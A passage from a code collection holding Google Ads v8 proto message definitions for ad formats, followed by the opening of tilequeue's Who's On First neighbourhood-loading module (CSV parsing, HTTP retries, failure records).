class DisplayCallToAction(proto.Message):
r"""Data for display call to action. The call to action is a
    piece of the ad that prompts the user to do something, like
clicking a link or making a phone call.
Attributes:
text (str):
Text for the display-call-to-action.
text_color (str):
Text color for the display-call-to-action in
hexadecimal, e.g. #ffffff for white.
url_collection_id (str):
Identifies the url collection in the ad.url_collections
field. If not set the url defaults to final_url.
"""
text = proto.Field(
proto.STRING,
number=5,
optional=True,
)
text_color = proto.Field(
proto.STRING,
number=6,
optional=True,
)
url_collection_id = proto.Field(
proto.STRING,
number=7,
optional=True,
)
class ProductImage(proto.Message):
r"""Product image specific data.
Attributes:
product_image (str):
The MediaFile resource name of the product
image. Valid image types are GIF, JPEG and PNG.
The minimum size is 300x300 pixels and the
aspect ratio must be 1:1 (+-1%).
description (str):
Description of the product.
display_call_to_action (google.ads.googleads.v8.common.types.DisplayCallToAction):
Display-call-to-action of the product image.
"""
product_image = proto.Field(
proto.STRING,
number=4,
optional=True,
)
description = proto.Field(
proto.STRING,
number=5,
optional=True,
)
display_call_to_action = proto.Field(
proto.MESSAGE,
number=3,
message='DisplayCallToAction',
)
class ProductVideo(proto.Message):
r"""Product video specific data.
Attributes:
product_video (str):
The MediaFile resource name of a video which
must be hosted on YouTube.
"""
product_video = proto.Field(
proto.STRING,
number=2,
optional=True,
)
class ImageAdInfo(proto.Message):
r"""An image ad.
Attributes:
pixel_width (int):
Width in pixels of the full size image.
pixel_height (int):
Height in pixels of the full size image.
image_url (str):
URL of the full size image.
preview_pixel_width (int):
Width in pixels of the preview size image.
preview_pixel_height (int):
Height in pixels of the preview size image.
preview_image_url (str):
URL of the preview size image.
mime_type (google.ads.googleads.v8.enums.types.MimeTypeEnum.MimeType):
The mime type of the image.
name (str):
The name of the image. If the image was
created from a MediaFile, this is the
MediaFile's name. If the image was created from
bytes, this is empty.
media_file (str):
The MediaFile resource to use for the image.
data (bytes):
Raw image data as bytes.
ad_id_to_copy_image_from (int):
An ad ID to copy the image from.
"""
pixel_width = proto.Field(
proto.INT64,
number=15,
optional=True,
)
pixel_height = proto.Field(
proto.INT64,
number=16,
optional=True,
)
image_url = proto.Field(
proto.STRING,
number=17,
optional=True,
)
preview_pixel_width = proto.Field(
proto.INT64,
number=18,
optional=True,
)
preview_pixel_height = proto.Field(
proto.INT64,
number=19,
optional=True,
)
preview_image_url = proto.Field(
proto.STRING,
number=20,
optional=True,
)
mime_type = proto.Field(
proto.ENUM,
number=10,
enum=gage_mime_type.MimeTypeEnum.MimeType,
)
name = proto.Field(
proto.STRING,
number=21,
optional=True,
)
media_file = proto.Field(
proto.STRING,
number=12,
oneof='image',
)
data = proto.Field(
proto.BYTES,
number=13,
oneof='image',
)
ad_id_to_copy_image_from = proto.Field(
proto.INT64,
number=14,
oneof='image',
)
class VideoBumperInStreamAdInfo(proto.Message):
r"""Representation of video bumper in-stream ad format (very
short in-stream non-skippable video ad).
Attributes:
companion_banner (str):
The MediaFile resource name of the companion
banner used with the ad.
"""
companion_banner = proto.Field(
proto.STRING,
number=2,
optional=True,
)
class VideoNonSkippableInStreamAdInfo(proto.Message):
r"""Representation of video non-skippable in-stream ad format (15
second in-stream non-skippable video ad).
Attributes:
companion_banner (str):
The MediaFile resource name of the companion
banner used with the ad.
"""
companion_banner = proto.Field(
proto.STRING,
number=2,
optional=True,
)
class VideoTrueViewInStreamAdInfo(proto.Message):
r"""Representation of video TrueView in-stream ad format (ad
shown during video playback, often at beginning, which displays
a skip button a few seconds into the video).
Attributes:
action_button_label (str):
Label on the CTA (call-to-action) button
taking the user to the video ad's final URL.
Required for TrueView for action campaigns,
optional otherwise.
action_headline (str):
Additional text displayed with the CTA (call-
            to-action) button to give context and encourage
clicking on the button.
companion_banner (str):
The MediaFile resource name of the companion
banner used with the ad.
"""
action_button_label = proto.Field(
proto.STRING,
number=4,
optional=True,
)
action_headline = proto.Field(
proto.STRING,
number=5,
optional=True,
)
companion_banner = proto.Field(
proto.STRING,
number=6,
optional=True,
)
class VideoOutstreamAdInfo(proto.Message):
r"""Representation of video out-stream ad format (ad shown
alongside a feed with automatic playback, without sound).
Attributes:
headline (str):
The headline of the ad.
description (str):
The description line.
"""
headline = proto.Field(
proto.STRING,
number=3,
optional=True,
)
description = proto.Field(
proto.STRING,
number=4,
optional=True,
)
class VideoTrueViewDiscoveryAdInfo(proto.Message):
r"""Representation of video TrueView discovery ad format.
Attributes:
headline (str):
The headline of the ad.
description1 (str):
First text line for a TrueView video
discovery ad.
description2 (str):
Second text line for a TrueView video
discovery ad.
"""
headline = proto.Field(
proto.STRING,
number=4,
optional=True,
)
description1 = proto.Field(
proto.STRING,
number=5,
optional=True,
)
description2 = proto.Field(
proto.STRING,
number=6,
optional=True,
)
class VideoAdInfo(proto.Message):
r"""A video ad.
Attributes:
media_file (str):
The MediaFile resource to use for the video.
in_stream (google.ads.googleads.v8.common.types.VideoTrueViewInStreamAdInfo):
Video TrueView in-stream ad format.
bumper (google.ads.googleads.v8.common.types.VideoBumperInStreamAdInfo):
Video bumper in-stream ad format.
out_stream (google.ads.googleads.v8.common.types.VideoOutstreamAdInfo):
Video out-stream ad format.
non_skippable (google.ads.googleads.v8.common.types.VideoNonSkippableInStreamAdInfo):
Video non-skippable in-stream ad format.
discovery (google.ads.googleads.v8.common.types.VideoTrueViewDiscoveryAdInfo):
Video TrueView discovery ad format.
"""
media_file = proto.Field(
proto.STRING,
number=7,
optional=True,
)
in_stream = proto.Field(
proto.MESSAGE,
number=2,
oneof='format',
message='VideoTrueViewInStreamAdInfo',
)
bumper = proto.Field(
proto.MESSAGE,
number=3,
oneof='format',
message='VideoBumperInStreamAdInfo',
)
out_stream = proto.Field(
proto.MESSAGE,
number=4,
oneof='format',
message='VideoOutstreamAdInfo',
)
non_skippable = proto.Field(
proto.MESSAGE,
number=5,
oneof='format',
message='VideoNonSkippableInStreamAdInfo',
)
discovery = proto.Field(
proto.MESSAGE,
number=6,
oneof='format',
message='VideoTrueViewDiscoveryAdInfo',
)
class VideoResponsiveAdInfo(proto.Message):
r"""A video responsive ad.
Attributes:
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets used for the short
headline, e.g. the "Call To Action" banner.
Currently, only a single value for the short
headline is supported.
long_headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets used for the long
headline. Currently, only a single value for the
long headline is supported.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets used for the description.
Currently, only a single value for the
description is supported.
call_to_actions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets used for the button, e.g.
the "Call To Action" button. Currently, only a
single value for the button is supported.
videos (Sequence[google.ads.googleads.v8.common.types.AdVideoAsset]):
List of YouTube video assets used for the ad.
Currently, only a single value for the YouTube
video asset is supported.
companion_banners (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
List of image assets used for the companion
banner. Currently, only a single value for the
companion banner asset is supported.
"""
headlines = proto.RepeatedField(
proto.MESSAGE,
number=1,
message=ad_asset.AdTextAsset,
)
long_headlines = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=3,
message=ad_asset.AdTextAsset,
)
call_to_actions = proto.RepeatedField(
proto.MESSAGE,
number=4,
message=ad_asset.AdTextAsset,
)
videos = proto.RepeatedField(
proto.MESSAGE,
number=5,
message=ad_asset.AdVideoAsset,
)
companion_banners = proto.RepeatedField(
proto.MESSAGE,
number=6,
message=ad_asset.AdImageAsset,
)
class ResponsiveSearchAdInfo(proto.Message):
r"""A responsive search ad.
Responsive search ads let you create an ad that adapts to show
more text, and more relevant messages, to your customers. Enter
multiple headlines and descriptions when creating a responsive
search ad, and over time, Google Ads will automatically test
different combinations and learn which combinations perform
best. By adapting your ad's content to more closely match
potential customers' search terms, responsive search ads may
improve your campaign's performance.
    More information at
    https://support.google.com/google-ads/answer/7684791
Attributes:
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for headlines. When the
ad serves the headlines will be selected from
this list.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for descriptions. When
the ad serves the descriptions will be selected
from this list.
path1 (str):
First part of text that may appear appended
to the url displayed in the ad.
path2 (str):
Second part of text that may appear appended
to the url displayed in the ad. This field can
only be set when path1 is also set.
"""
headlines = proto.RepeatedField(
proto.MESSAGE,
number=1,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdTextAsset,
)
path1 = proto.Field(
proto.STRING,
number=5,
optional=True,
)
path2 = proto.Field(
proto.STRING,
number=6,
optional=True,
)
class LegacyResponsiveDisplayAdInfo(proto.Message):
r"""A legacy responsive display ad. Ads of this type are labeled
'Responsive ads' in the Google Ads UI.
Attributes:
short_headline (str):
The short version of the ad's headline.
long_headline (str):
The long version of the ad's headline.
description (str):
The description of the ad.
business_name (str):
The business name in the ad.
allow_flexible_color (bool):
Advertiser's consent to allow flexible color. When true, the
ad may be served with different color if necessary. When
false, the ad will be served with the specified colors or a
neutral color. The default value is true. Must be true if
main_color and accent_color are not set.
accent_color (str):
The accent color of the ad in hexadecimal, e.g. #ffffff for
white. If one of main_color and accent_color is set, the
other is required as well.
main_color (str):
The main color of the ad in hexadecimal, e.g. #ffffff for
white. If one of main_color and accent_color is set, the
other is required as well.
call_to_action_text (str):
The call-to-action text for the ad.
logo_image (str):
The MediaFile resource name of the logo image
used in the ad.
square_logo_image (str):
The MediaFile resource name of the square
logo image used in the ad.
marketing_image (str):
The MediaFile resource name of the marketing
image used in the ad.
square_marketing_image (str):
The MediaFile resource name of the square
marketing image used in the ad.
format_setting (google.ads.googleads.v8.enums.types.DisplayAdFormatSettingEnum.DisplayAdFormatSetting):
Specifies which format the ad will be served in. Default is
ALL_FORMATS.
price_prefix (str):
Prefix before price. E.g. 'as low as'.
promo_text (str):
Promotion text used for dynamic formats of
responsive ads. For example 'Free two-day
shipping'.
"""
short_headline = proto.Field(
proto.STRING,
number=16,
optional=True,
)
long_headline = proto.Field(
proto.STRING,
number=17,
optional=True,
)
description = proto.Field(
proto.STRING,
number=18,
optional=True,
)
business_name = proto.Field(
proto.STRING,
number=19,
optional=True,
)
allow_flexible_color = proto.Field(
proto.BOOL,
number=20,
optional=True,
)
accent_color = proto.Field(
proto.STRING,
number=21,
optional=True,
)
main_color = proto.Field(
proto.STRING,
number=22,
optional=True,
)
call_to_action_text = proto.Field(
proto.STRING,
number=23,
optional=True,
)
logo_image = proto.Field(
proto.STRING,
number=24,
optional=True,
)
square_logo_image = proto.Field(
proto.STRING,
number=25,
optional=True,
)
marketing_image = proto.Field(
proto.STRING,
number=26,
optional=True,
)
square_marketing_image = proto.Field(
proto.STRING,
number=27,
optional=True,
)
format_setting = proto.Field(
proto.ENUM,
number=13,
enum=display_ad_format_setting.DisplayAdFormatSettingEnum.DisplayAdFormatSetting,
)
price_prefix = proto.Field(
proto.STRING,
number=28,
optional=True,
)
promo_text = proto.Field(
proto.STRING,
number=29,
optional=True,
)
class AppAdInfo(proto.Message):
r"""An app ad.
Attributes:
mandatory_ad_text (google.ads.googleads.v8.common.types.AdTextAsset):
Mandatory ad text.
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for headlines. When the
ad serves the headlines will be selected from
this list.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for descriptions. When
the ad serves the descriptions will be selected
from this list.
images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
List of image assets that may be displayed
with the ad.
youtube_videos (Sequence[google.ads.googleads.v8.common.types.AdVideoAsset]):
List of YouTube video assets that may be
displayed with the ad.
html5_media_bundles (Sequence[google.ads.googleads.v8.common.types.AdMediaBundleAsset]):
List of media bundle assets that may be used
with the ad.
"""
mandatory_ad_text = proto.Field(
proto.MESSAGE,
number=1,
message=ad_asset.AdTextAsset,
)
headlines = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=3,
message=ad_asset.AdTextAsset,
)
images = proto.RepeatedField(
proto.MESSAGE,
number=4,
message=ad_asset.AdImageAsset,
)
youtube_videos = proto.RepeatedField(
proto.MESSAGE,
number=5,
message=ad_asset.AdVideoAsset,
)
html5_media_bundles = proto.RepeatedField(
proto.MESSAGE,
number=6,
message=ad_asset.AdMediaBundleAsset,
)
class AppEngagementAdInfo(proto.Message):
r"""App engagement ads allow you to write text encouraging a
specific action in the app, like checking in, making a purchase,
or booking a flight. They allow you to send users to a specific
part of your app where they can find what they're looking for
easier and faster.
Attributes:
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for headlines. When the
ad serves the headlines will be selected from
this list.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for descriptions. When
the ad serves the descriptions will be selected
from this list.
images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
List of image assets that may be displayed
with the ad.
videos (Sequence[google.ads.googleads.v8.common.types.AdVideoAsset]):
List of video assets that may be displayed
with the ad.
"""
headlines = proto.RepeatedField(
proto.MESSAGE,
number=1,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdTextAsset,
)
images = proto.RepeatedField(
proto.MESSAGE,
number=3,
message=ad_asset.AdImageAsset,
)
videos = proto.RepeatedField(
proto.MESSAGE,
number=4,
message=ad_asset.AdVideoAsset,
)
class LegacyAppInstallAdInfo(proto.Message):
r"""A legacy app install ad that only can be used by a few select
customers.
Attributes:
app_id (str):
The id of the mobile app.
app_store (google.ads.googleads.v8.enums.types.LegacyAppInstallAdAppStoreEnum.LegacyAppInstallAdAppStore):
The app store the mobile app is available in.
headline (str):
The headline of the ad.
description1 (str):
The first description line of the ad.
description2 (str):
The second description line of the ad.
"""
app_id = proto.Field(
proto.STRING,
number=6,
optional=True,
)
app_store = proto.Field(
proto.ENUM,
number=2,
enum=legacy_app_install_ad_app_store.LegacyAppInstallAdAppStoreEnum.LegacyAppInstallAdAppStore,
)
headline = proto.Field(
proto.STRING,
number=7,
optional=True,
)
description1 = proto.Field(
proto.STRING,
number=8,
optional=True,
)
description2 = proto.Field(
proto.STRING,
number=9,
optional=True,
)
class ResponsiveDisplayAdInfo(proto.Message):
r"""A responsive display ad.
Attributes:
marketing_images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
Marketing images to be used in the ad. Valid image types are
GIF, JPEG, and PNG. The minimum size is 600x314 and the
aspect ratio must be 1.91:1 (+-1%). At least one
marketing_image is required. Combined with
square_marketing_images the maximum is 15.
square_marketing_images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
Square marketing images to be used in the ad. Valid image
types are GIF, JPEG, and PNG. The minimum size is 300x300
and the aspect ratio must be 1:1 (+-1%). At least one square
marketing_image is required. Combined with marketing_images
the maximum is 15.
logo_images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
Logo images to be used in the ad. Valid image types are GIF,
JPEG, and PNG. The minimum size is 512x128 and the aspect
ratio must be 4:1 (+-1%). Combined with square_logo_images
the maximum is 5.
square_logo_images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
Square logo images to be used in the ad. Valid image types
are GIF, JPEG, and PNG. The minimum size is 128x128 and the
aspect ratio must be 1:1 (+-1%). Combined with
square_logo_images the maximum is 5.
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
Short format headlines for the ad. The
maximum length is 30 characters. At least 1 and
max 5 headlines can be specified.
long_headline (google.ads.googleads.v8.common.types.AdTextAsset):
A required long format headline. The maximum
length is 90 characters.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
Descriptive texts for the ad. The maximum
length is 90 characters. At least 1 and max 5
headlines can be specified.
youtube_videos (Sequence[google.ads.googleads.v8.common.types.AdVideoAsset]):
Optional YouTube videos for the ad. A maximum
of 5 videos can be specified.
business_name (str):
The advertiser/brand name. Maximum display
width is 25.
main_color (str):
The main color of the ad in hexadecimal, e.g. #ffffff for
white. If one of main_color and accent_color is set, the
other is required as well.
accent_color (str):
The accent color of the ad in hexadecimal, e.g. #ffffff for
white. If one of main_color and accent_color is set, the
other is required as well.
allow_flexible_color (bool):
Advertiser's consent to allow flexible color. When true, the
ad may be served with different color if necessary. When
false, the ad will be served with the specified colors or a
neutral color. The default value is true. Must be true if
main_color and accent_color are not set.
call_to_action_text (str):
The call-to-action text for the ad. Maximum
display width is 30.
price_prefix (str):
Prefix before price. E.g. 'as low as'.
promo_text (str):
Promotion text used for dynamic formats of
responsive ads. For example 'Free two-day
shipping'.
format_setting (google.ads.googleads.v8.enums.types.DisplayAdFormatSettingEnum.DisplayAdFormatSetting):
Specifies which format the ad will be served in. Default is
ALL_FORMATS.
control_spec (google.ads.googleads.v8.common.types.ResponsiveDisplayAdControlSpec):
Specification for various creative controls.
"""
marketing_images = proto.RepeatedField(
proto.MESSAGE,
number=1,
message=ad_asset.AdImageAsset,
)
square_marketing_images = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdImageAsset,
)
logo_images = proto.RepeatedField(
proto.MESSAGE,
number=3,
message=ad_asset.AdImageAsset,
)
square_logo_images = proto.RepeatedField(
proto.MESSAGE,
number=4,
message=ad_asset.AdImageAsset,
)
headlines = proto.RepeatedField(
proto.MESSAGE,
number=5,
message=ad_asset.AdTextAsset,
)
long_headline = proto.Field(
proto.MESSAGE,
number=6,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=7,
message=ad_asset.AdTextAsset,
)
youtube_videos = proto.RepeatedField(
proto.MESSAGE,
number=8,
message=ad_asset.AdVideoAsset,
)
business_name = proto.Field(
proto.STRING,
number=17,
optional=True,
)
main_color = proto.Field(
proto.STRING,
number=18,
optional=True,
)
accent_color = proto.Field(
proto.STRING,
number=19,
optional=True,
)
allow_flexible_color = proto.Field(
proto.BOOL,
number=20,
optional=True,
)
call_to_action_text = proto.Field(
proto.STRING,
number=21,
optional=True,
)
price_prefix = proto.Field(
proto.STRING,
number=22,
optional=True,
)
promo_text = proto.Field(
proto.STRING,
number=23,
optional=True,
)
format_setting = proto.Field(
proto.ENUM,
number=16,
enum=display_ad_format_setting.DisplayAdFormatSettingEnum.DisplayAdFormatSetting,
)
control_spec = proto.Field(
proto.MESSAGE,
number=24,
message='ResponsiveDisplayAdControlSpec',
)
class LocalAdInfo(proto.Message):
r"""A local ad.
Attributes:
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for headlines. When the
ad serves the headlines will be selected from
this list. At least 1 and at most 5 headlines
must be specified.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for descriptions. When
the ad serves the descriptions will be selected
from this list. At least 1 and at most 5
descriptions must be specified.
call_to_actions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for call-to-actions. When
the ad serves the call-to-actions will be
selected from this list. Call-to-actions are
optional and at most 5 can be specified.
marketing_images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
List of marketing image assets that may be
displayed with the ad. The images must be
314x600 pixels or 320x320 pixels. At least 1 and
at most 20 image assets must be specified.
logo_images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
List of logo image assets that may be
displayed with the ad. The images must be
128x128 pixels and not larger than 120KB. At
least 1 and at most 5 image assets must be
specified.
videos (Sequence[google.ads.googleads.v8.common.types.AdVideoAsset]):
List of YouTube video assets that may be
displayed with the ad. Videos are optional and
at most 20 can be specified.
path1 (str):
First part of optional text that may appear
appended to the url displayed in the ad.
path2 (str):
Second part of optional text that may appear
appended to the url displayed in the ad. This
field can only be set when path1 is also set.
"""
headlines = proto.RepeatedField(
proto.MESSAGE,
number=1,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdTextAsset,
)
call_to_actions = proto.RepeatedField(
proto.MESSAGE,
number=3,
message=ad_asset.AdTextAsset,
)
marketing_images = proto.RepeatedField(
proto.MESSAGE,
number=4,
message=ad_asset.AdImageAsset,
)
logo_images = proto.RepeatedField(
proto.MESSAGE,
number=5,
message=ad_asset.AdImageAsset,
)
videos = proto.RepeatedField(
proto.MESSAGE,
number=6,
message=ad_asset.AdVideoAsset,
)
path1 = proto.Field(
proto.STRING,
number=9,
optional=True,
)
path2 = proto.Field(
proto.STRING,
number=10,
optional=True,
)
class DisplayUploadAdInfo(proto.Message):
r"""A generic type of display ad. The exact ad format is controlled by
the display_upload_product_type field, which determines what kinds
of data need to be included with the ad.
Attributes:
display_upload_product_type (google.ads.googleads.v8.enums.types.DisplayUploadProductTypeEnum.DisplayUploadProductType):
The product type of this ad. See comments on
the enum for details.
media_bundle (google.ads.googleads.v8.common.types.AdMediaBundleAsset):
A media bundle asset to be used in the ad. For information
about the media bundle for HTML5_UPLOAD_AD see
https://support.google.com/google-ads/answer/1722096 Media
bundles that are part of dynamic product types use a special
format that needs to be created through the Google Web
Designer. See
https://support.google.com/webdesigner/answer/7543898 for
more information.
"""
display_upload_product_type = proto.Field(
proto.ENUM,
number=1,
enum=gage_display_upload_product_type.DisplayUploadProductTypeEnum.DisplayUploadProductType,
)
media_bundle = proto.Field(
proto.MESSAGE,
number=2,
oneof='media_asset',
message=ad_asset.AdMediaBundleAsset,
)
class ResponsiveDisplayAdControlSpec(proto.Message):
r"""Specification for various creative controls for a responsive
display ad.
Attributes:
enable_asset_enhancements (bool):
Whether the advertiser has opted into the
asset enhancements feature.
enable_autogen_video (bool):
Whether the advertiser has opted into auto-
            gen video feature.
"""
enable_asset_enhancements = proto.Field(
proto.BOOL,
number=1,
)
enable_autogen_video = proto.Field(
proto.BOOL,
number=2,
)
class SmartCampaignAdInfo(proto.Message):
r"""A Smart campaign ad.
Attributes:
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for headlines. When the
ad serves the headlines will be selected from
this list. 3 headlines must be specified.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for descriptions. When
the ad serves the descriptions will be selected
from this list. 2 descriptions must be
specified.
"""
headlines = proto.RepeatedField(
proto.MESSAGE,
number=1,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdTextAsset,
)
class CallAdInfo(proto.Message):
r"""A call ad.
Attributes:
country_code (str):
The country code in the ad.
phone_number (str):
The phone number in the ad.
business_name (str):
The business name in the ad.
headline1 (str):
First headline in the ad.
headline2 (str):
Second headline in the ad.
description1 (str):
The first line of the ad's description.
description2 (str):
The second line of the ad's description.
call_tracked (bool):
Whether to enable call tracking for the
creative. Enabling call tracking also enables
call conversions.
disable_call_conversion (bool):
Whether to disable call conversion for the creative. If set
to ``true``, disables call conversions even when
``call_tracked`` is ``true``. If ``call_tracked`` is
``false``, this field is ignored.
phone_number_verification_url (str):
The URL to be used for phone number
verification.
conversion_action (str):
The conversion action to attribute a call conversion to. If
not set a default conversion action is used. This field only
has effect if call_tracked is set to true. Otherwise this
field is ignored.
conversion_reporting_state (google.ads.googleads.v8.enums.types.CallConversionReportingStateEnum.CallConversionReportingState):
The call conversion behavior of this call ad.
It can use its own call conversion setting,
inherit the account level setting, or be
disabled.
path1 (str):
First part of text that may appear appended
            to the url displayed in the ad. Optional.
path2 (str):
Second part of text that may appear appended
            to the url displayed in the ad. This field
can only be set when path1 is set. Optional.
"""
country_code = proto.Field(
proto.STRING,
number=1,
)
phone_number = proto.Field(
proto.STRING,
number=2,
)
business_name = proto.Field(
proto.STRING,
number=3,
)
headline1 = proto.Field(
proto.STRING,
number=11,
)
headline2 = proto.Field(
proto.STRING,
number=12,
)
description1 = proto.Field(
proto.STRING,
number=4,
)
description2 = proto.Field(
proto.STRING,
number=5,
)
call_tracked = proto.Field(
proto.BOOL,
number=6,
)
disable_call_conversion = proto.Field(
proto.BOOL,
number=7,
)
phone_number_verification_url = proto.Field(
proto.STRING,
number=8,
)
conversion_action = proto.Field(
proto.STRING,
number=9,
)
conversion_reporting_state = proto.Field(
proto.ENUM,
number=10,
enum=call_conversion_reporting_state.CallConversionReportingStateEnum.CallConversionReportingState,
)
path1 = proto.Field(
proto.STRING,
number=13,
)
path2 = proto.Field(
proto.STRING,
number=14,
)
__all__ = tuple(sorted(__protobuf__.manifest))
|
apache-2.0
| 1,371,305,617,412,775,000
| 30.178258
| 135
| 0.60667
| false
| 4.161035
| false
| false
| false
|
mapzen/tilequeue
|
tilequeue/wof.py
|
1
|
46004
|
from __future__ import absolute_import
from collections import namedtuple
from contextlib import closing
from cStringIO import StringIO
from datetime import datetime
from edtf import parse_edtf
from operator import attrgetter
from psycopg2.extras import register_hstore
from shapely import geos
from tilequeue.tile import coord_marshall_int
from tilequeue.tile import coord_unmarshall_int
from tilequeue.tile import mercator_point_to_coord
from tilequeue.tile import reproject_lnglat_to_mercator
import csv
import json
import os.path
import psycopg2
import Queue
import requests
import shapely.geometry
import shapely.ops
import shapely.wkb
import threading
DATABASE_SRID = 3857
def generate_csv_lines(requests_result):
for line in requests_result.iter_lines():
if line:
yield line
neighbourhood_placetypes_to_int = dict(
neighbourhood=1,
microhood=2,
macrohood=3,
borough=4,
)
neighbourhood_int_to_placetypes = {
1: 'neighbourhood',
2: 'microhood',
3: 'macrohood',
4: 'borough',
}
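# The integer codes above are what get stored in the database placetype
# column; the reverse mapping is used when reading rows back out.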
NeighbourhoodMeta = namedtuple(
'NeighbourhoodMeta',
'wof_id placetype name hash label_position')
Neighbourhood = namedtuple(
'Neighbourhood',
'wof_id placetype name hash label_position geometry n_photos area '
'min_zoom max_zoom is_landuse_aoi inception cessation l10n_names')
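# Parse the WOF meta CSV one row at a time, skipping superseded or incomplete
# rows, and yield NeighbourhoodMeta tuples with the label position
# reprojected to web mercator.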
def parse_neighbourhood_meta_csv(csv_line_generator, placetype):
reader = csv.reader(csv_line_generator)
it = iter(reader)
header = it.next()
lbl_lat_idx = header.index('lbl_latitude')
lbl_lng_idx = header.index('lbl_longitude')
name_idx = header.index('name')
wof_id_idx = header.index('id')
hash_idx = header.index('file_hash')
superseded_by_idx = header.index('superseded_by')
min_row_length = (max(
lbl_lat_idx, lbl_lng_idx, name_idx, wof_id_idx, hash_idx,
superseded_by_idx) + 1)
for row in it:
if len(row) < min_row_length:
continue
superseded_by = row[superseded_by_idx]
if superseded_by:
continue
wof_id_str = row[wof_id_idx]
if not wof_id_str:
continue
try:
wof_id = int(wof_id_str)
except ValueError:
continue
name = row[name_idx]
if not name:
continue
lat_str = row[lbl_lat_idx]
lng_str = row[lbl_lng_idx]
try:
lat = float(lat_str)
lng = float(lng_str)
except ValueError:
continue
file_hash = row[hash_idx]
label_x, label_y = reproject_lnglat_to_mercator(lng, lat)
label_position = shapely.geometry.Point(label_x, label_y)
neighbourhood_meta = NeighbourhoodMeta(
wof_id, placetype, name, file_hash, label_position)
yield neighbourhood_meta
def _make_requests_session_with_retries(max_retries):
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util import Retry
s = requests.Session()
a = HTTPAdapter(
max_retries=Retry(
total=max_retries,
status_forcelist=[ # this is a list of statuses to consider to be
# an error and retry.
429, # Too many requests (i.e: back off)
500, # Generic internal server error
502, # Bad Gateway - i.e: upstream failure
503, # Unavailable, temporarily
504, # Gateway timeout
522 # Origin connection timed out
],
backoff_factor=1.0 # back off for 0s, 1s, 3s, 7s, etc... after
# each successive failure. (factor*(2^N-1))
))
# use retry for both HTTP and HTTPS connections.
s.mount('http://', a)
s.mount('https://', a)
return s
def fetch_wof_url_meta_neighbourhoods(url, placetype, max_retries):
s = _make_requests_session_with_retries(max_retries)
r = s.get(url, stream=True)
assert r.status_code == 200, 'Failure requesting: %s' % url
csv_line_generator = generate_csv_lines(r)
return parse_neighbourhood_meta_csv(csv_line_generator, placetype)
class NeighbourhoodFailure(object):
def __init__(self, wof_id, reason, message, halt=False, skipped=False,
funky=False, superseded=False):
# halt is a signal that threads should stop fetching. This
# would happen during a network IO error or when we get an
# unexpected http response when fetching raw json files. In
# some scenarios this could be recoverable, but because that
# isn't always the case we assume that we should stop further
# requests for more raw json files, and just process what we
# have so far.
# skipped means that we won't log this failure, ie there was
# an earlier "halt" error and processing of further records
# has stopped.
# funky is a signal downstream that this is a "soft" or
# expected failure, in the sense that it only means that we
# should skip the record, but we didn't actually detect any
# errors with the processing
# superseded is set when the json has a value for
# wof:superseded. This would indicate a data inconsistency
# because the meta csv file didn't have it set if we're trying
# to fetch the raw json in the first place. But this is meant
# to catch this scenario.
self.wof_id = wof_id
self.reason = reason
self.message = message
self.halt = halt
self.skipped = skipped
self.funky = funky
self.superseded = superseded
# given a string, parse it as EDTF while allowing a single 'u' or None to mean
# completely unknown, and return the EDTF object.
def _normalize_edtf(s):
if s and s != 'u':
try:
return parse_edtf(s)
except Exception:
pass
# when all else fails, return the "most unknown" EDTF.
return parse_edtf('uuuu')
def create_neighbourhood_from_json(json_data, neighbourhood_meta):
def failure(reason):
return NeighbourhoodFailure(
neighbourhood_meta.wof_id, reason, json.dumps(json_data))
if not isinstance(json_data, dict):
return failure('Unexpected json')
props = json_data.get('properties')
if props is None or not isinstance(props, dict):
return failure('Missing properties')
superseded_by = props.get('wof:superseded_by')
# these often show up as empty lists, so we do a truthy test
    # instead of explicitly checking for None
if superseded_by:
return NeighbourhoodFailure(
neighbourhood_meta.wof_id,
'superseded_by: %s' % superseded_by,
json.dumps(json_data), superseded=True)
geometry = json_data.get('geometry')
if geometry is None:
